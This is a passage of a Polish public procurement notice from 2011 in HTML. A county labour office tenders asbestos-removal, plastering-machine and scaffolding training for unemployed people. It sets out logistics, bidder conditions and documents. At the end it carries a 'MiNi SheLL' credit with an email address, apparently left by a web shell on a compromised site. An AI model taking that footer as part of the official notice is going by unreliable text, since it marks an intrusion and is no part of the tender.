a.	W przypadku gdy odległość pomiędzy miejscem zamieszkania uczestnika szkolenia, a miejscem odbywania szkolenia przekracza 60 km Wykonawca ma obowiązek zapewnić zakwaterowanie od poniedziałku do piątku włącznie oraz pełne wyżywienie tj. śniadanie, obiad, kolacja oraz jedną przerwę kawową od poniedziałku do czwartku włącznie. W piątki Wykonawca musi zapewnić uczestnikom szkolenia śniadanie oraz jedną przerwę kawową. 
W przypadku gdy nie wszyscy uczestnicy szkolenia będą korzystali z zakwaterowania i wyżywienia, faktura za szkolenie zostanie pomniejszona proporcjonalnie. O ilości osób, które będą korzystały z zakwaterowania i wyżywienia Zamawiający poinformuje Wykonawcę najpóźniej w dniu podpisania umowy lub na 5 dni przed rozpoczęciem szkolenia.
Obiady mają składać się z  minimum dwóch dań tj. zupy i dania głównego podczas którego należy zapewnić również wodę i/lub sok.
Na przerwach kawowych Wykonawca musi podać kawę i/lub herbatę i/lub wodę.
W przypadku gdy zajęcia praktyczne i/lub teoretyczne odbywać się będą w innej miejscowości niż zakwaterowanie Wykonawca musi zapewnić uczestnikom szkolenia przejazdy z miejsca zakwaterowania do miejsca odbywania szkolenia i z powrotem busem lub samochodem. W przypadku gdy zajęcia praktyczne i teoretyczne odbywać się będą w innych miejscowościach Wykonawca musi również zapewnić przejazdy pomiędzy tymi miejscami. 
(Koszty zakwaterowania i/lub wyżywienia i/lub transportu należy podać w Kosztach szkolenia. Jest on kosztem warunkowym). 
Na potrzeby niniejszego postępowania odległości będą mierzone od miejsca zamieszkania uczestnika szkolenia do miejsca odbywania zajęć teoretycznych lub praktycznych na podstawie http://mapy.google.pl/ 

b.	Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje stypendium oraz którym przysługuje stypendium, o którym mowa w art. 41 ust. 3b ustawy (podejmujących zatrudnienie w trakcie szkolenia). Ubezpieczenie musi zostać opłacone w przypadku uczestnika szkolenia będącego osobą bezrobotną od  dnia podjęcia przez niego zatrudnienia, natomiast w przypadku uczestnika szkolenia będącego poszukującym pracy, o którym mowa w art. 43 ust. 1 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez niego szkolenia.
Zapłata należności za zorganizowanie szkolenia obejmuje m. in. koszty ubezpieczenia od następstw nieszczęśliwych wypadków uczestnika szkolenia, powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, tylko w przypadku, gdy wydatek z tego tytułu został poniesiony i udokumentowany przez Wykonawcę. Informacja o konieczności ubezpieczenia uczestnika/ów szkolenia zostanie przekazana Wykonawcy przez Zamawiającego pisemnie. 
Koszt ubezpieczenia ujęty w Kosztach szkolenia kosztów jest kosztem warunkowym.
c.	Po zakończeniu szkolenia każdej 5 osobowej grupy należy wystawić oddzielną fakturę.
15.	Koszty badań lekarskich uczestników szkolenia pokrywa Zamawiający.
16.	W ostatnim dniu szkolenia Wykonawca jest zobowiązany przeprowadzić badanie ankietowe uczestnikom szkolenia służące ocenie szkolenia (wzór ankiety stanowi załącznik do umowy szkoleniowej i jest to druk Zamawiającego)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 27.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia. 
a.	Zamawiający uzna spełnienie przez Wykonawcę warunku posiadania uprawnień do wykonywania  określonej działalności i czynności, jeżeli ten oświadczy, że posiada wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia. 
b.	Zamawiający uzna spełnienie przez Wykonawcę warunku posiadania wiedzy i doświadczenia, jeżeli ten wykaże, że posiada doświadczenie w realizacji szkoleń o tej samej tematyce: doświadczenie w realizacji szkoleń grupowych 10 osobowych o tej samej tematyce min. 1 szkolenie grupowe przeprowadzone w 2010/2011 roku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia. 
c.	Zamawiający uzna spełnienie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia jeżeli ten wykaże, że:
będzie dysponował potencjałem technicznym zdolnym do prawidłowego wykonania przedmiotowego zamówienia, tj. 
dla części I przetargu: sprzętem do usuwania i zabezpieczania wyrobów zawierających azbest oraz 10 kompletami odzieży ochronnej dla uczestników szkolenia zgodnie z załącznikiem do Rozporządzenia Ministra Gospodarki i Pracy z dnia 14 października 2005r. (poz. 1824) (Załącznik nr 1 do SIWZ punkt II podpunkt 8b), 
dla części II przetargu: minimum jednym agregatem tynkarskim (Załącznik nr 1 do SIWZ punkt II podpunkt 8b), 
dla części III przetargu: minimum 1 kompletem rusztowania rurowo-złączkowego oraz dowolnego rusztowania systemowego w ilości około 100 m2 każde, ze ścianą  służącą do montażu rusztowań z możliwością ich kotwienia (Załącznik nr 1 do SIWZ punkt II podpunkt 8b).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia. 
c.	Zamawiający uzna spełnienie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia jeżeli ten wykaże, że:
będzie dysponował odpowiednim potencjałem kadrowym - osobami zdolnymi do prawidłowego wykonania zamówienia, posiadającymi tj. każda z osób kadry dydaktycznej będzie posiadać doświadczenie w prowadzeniu co najmniej co najmniej 1 szkolenia grupowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia. 
d.	Zamawiający uzna spełnienie przez Wykonawcę warunku znajdowania się w odpowiedniej sytuacji ekonomicznej i finansowej, jeżeli ten oświadczy, że znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>h.	oświadczenia zawierającego: informacje dot. reprezentacji Wykonawcy (w przypadku Wykonawców posiadających wpis do ewidencji działalności gospodarczej), (w przypadku spółek cywilnych każdy ze wspólników musi złożyć osobne oświadczenie), na temat wpisu do RIS oraz akceptacji warunków określonych w SIWZ (Załącznik nr 2 do SIWZ (oryginał)),
i.	pełnomocnictwa - w przypadku podpisywania oferty lub innych dokumentów załączonych do oferty przez pełnomocnika, to Wykonawca ma obowiązek dołączyć do oferty oryginał lub kserokopię potwierdzoną za zgodność z oryginałem przez osoby do tego upoważnione stosownego pełnomocnictwa,
j.	w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy stanowi załącznik nr 4 do SIWZ.
Umowa w sprawie zamówienia publicznego będzie zawarta z Wykonawcą, którego oferta zostanie wybrana w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostanie przesłane w sposób określony w art. 27 ust. 2 ustawy P.z.p.1, albo w terminie 10 dni - jeżeli zostanie przesłane droga pocztową.
Umowa zostanie zawarta z uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji oraz danych zawartych w ofercie.
              Zamawiający dopuszcza możliwość dokonania zmian w treści zawartej umowy. 
1. Jeżeli  nastąpi zmniejszenie liczby osób bezrobotnych Zamawiający zastrzega sobie prawo skierowania kolejnych osób celem uzupełnienia liczby osób odbywających szkolenie, w sytuacji gdy pozostała ilość godzin szkolenia umożliwi ukończenie go i zdobycie uprawnień.
Zmniejszenie liczby uczestników szkolenia może być wynikiem, w szczególności: 
a.	nie podjęcia szkolenia przez uczestników szkolenia, 
b.	nieusprawiedliwionych nieobecności uczestników szkolenia. 
2.	Umowa może ulec zmianie w wyniku następujących okoliczności ze strony Wykonawcy: 
a.	zmiana kadry realizującej kurs w wyniku nieprzewidywalnych zdarzeń losowych (długotrwała choroba, śmierć, rozwiązanie umowy o pracę lub umowy cywilnoprawnej ze strony wykładowcy, rozwiązanie umowy o pracę przez Wykonawcę w trybie art. 52 kp), których nie można było przewidzieć w dniu zawarcia umowy. W takiej sytuacji Wykonawca jest zobowiązany do przedstawienia do akceptacji harmonogramu uwzględniającego wszystkie zmiany w terminie 7 dni od ich zaistnienia.
b.	w przypadku zmiany statusu prawnego Wykonawcy, siedziby Wykonawcy, miejsc prowadzenia szkolenia, zmiany nazwy Wykonawcy, zmiany osób uprawnionych do reprezentacji, zmianie członków zarządu itp.
c.	Zmiany do umowy zostaną wprowadzane przez zawarcie aneksu pisemnego pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.swiecie.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy urząd Pracy w Świeciu
ul. Wojska Polskiego 195 a
86-100 Świecie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2011 godzina 10:00, miejsce: Powiatowy urząd Pracy w Świeciu
ul. Wojska Polskiego 195 a
86-100 Świecie p. 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie pn. Zabezpieczanie i usuwanie wyrobów zawierających azbest..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a.	Nazwa szkolenia: Zabezpieczanie i usuwanie wyrobów zawierających azbest.
b.	Zakres szkolenia
Program szkolenia musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki i Pracy z dnia 14 października 2005 r. w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów (Dz. U. z 2005 r. Nr 216, poz. 1824), Rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 02 kwietnia 2004 r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. z 2004 r. Nr 71, poz. 649) oraz w ustawie z dnia 19 czerwca 1997 r. o zakazie stosowania wyrobów zawierających azbest (Dz. U. z 2004 r. Nr 3, poz. 20, z późn. zm.).
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia: 50 godzin zajęć dla każdej grupy 5 osobowej w tym: 
5,5 godzin zajęć teoretycznych,
44,5 godziny zajęć praktycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 27.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> szkolenie: Operator agregatu tynkarskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a.	Nazwa szkolenia: Operator agregatu tynkarskiego.
b.	Zakres szkolenia
Program i ilość godzin szkolenia musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263), ponadto musi być zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia: 63 godziny zajęć dla każdej grupy 5 osobowej w tym: 
39 godzin teoretycznych,
24 godziny praktycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 28.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> szkolenie: Montaż rusztowań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a.	Nazwa szkolenia: Montaż rusztowań.
b.	Zakres szkolenia
Program i ilość godzin szkolenia musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, Poz. 1263), ponadto musi być zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia: 80 godziny zajęć dla każdej grupy 5 osobowej w tym: 
48 godzin teoretycznych,
32 godziny praktycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com